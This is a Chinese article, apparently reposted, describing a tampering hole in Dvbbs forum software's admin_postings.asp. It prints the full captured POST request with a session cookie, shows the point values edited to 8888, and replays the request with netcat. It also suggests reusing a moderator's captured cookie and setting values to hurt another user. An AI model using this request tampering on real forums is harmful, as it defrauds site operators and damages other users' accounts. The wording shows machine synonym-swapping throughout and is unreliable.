动网论坛刷分刷经验漏洞

  动网对admin_postings.asp设置不严..在举行贴子提升时.可以自己界说数字..到达刷分..刷履历及魅力的目标.
  比如我有一贴,
  http://127.0.0.1/dispbbs.asp?boardID=30&ID=26954&page=1
  然后对本贴举行提升
  http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
  默认提升最高的数目是50..如下图
  这时间我们用WSockExpert举行抓包....抓到包为
  POST /admin_postings.asp?action=uptopic HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
  Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
  Accept-Language: zh-cn
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
  Host: 127.0.0.1
  Content-Length: 141
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0
  title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=50&douserCP=50&douserEP=50&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
  然后我们来举行修改.
  数值修改就在这么一段
  doWealth=50&douserCP=50&douserEP=50
  我们改为恣意一个数...这里我改了doWealth=8888&douserCP=8888&douserEP=8888图个吉利..哈哈.
  因为数字修改了..字节也就增加了..我加了6个..以是就做了6个字节..把原来的
  Content-Length: 141
  改为
  Content-Length: 147
  完成的就为
  POST /admin_postings.asp?action=uptopic HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
  Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
  Accept-Language: zh-cn
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
  Host: 127.0.0.1
  Content-Length: 147
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0
  title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=8888&douserCP=8888&douserEP=8888&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
  然后nc提交
  c:\nc 127.0.0.1 80 <1.txt
  重复提交几次..失掉的结果如下图
  本测试过程因此版主身份举行的..平凡用户暂为测试....个人想法是..当地假定一BBS..以版主身份登岸..抓取cookie包..然后以平凡用户登岸一论坛..发贴抓一包..然后将两个包修改..举行提交..如果admin_postings.asp真的设置不严格..应该异样可以到达此目标...此漏洞利用不大..不外对付那些必要金币或魅力及履历值达几多才可以浏缆的贴的论坛是大有用户啊...固然..你要整某人一下..大可以把数字改为正数..不外要记的把Content-Length:改对哦,
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：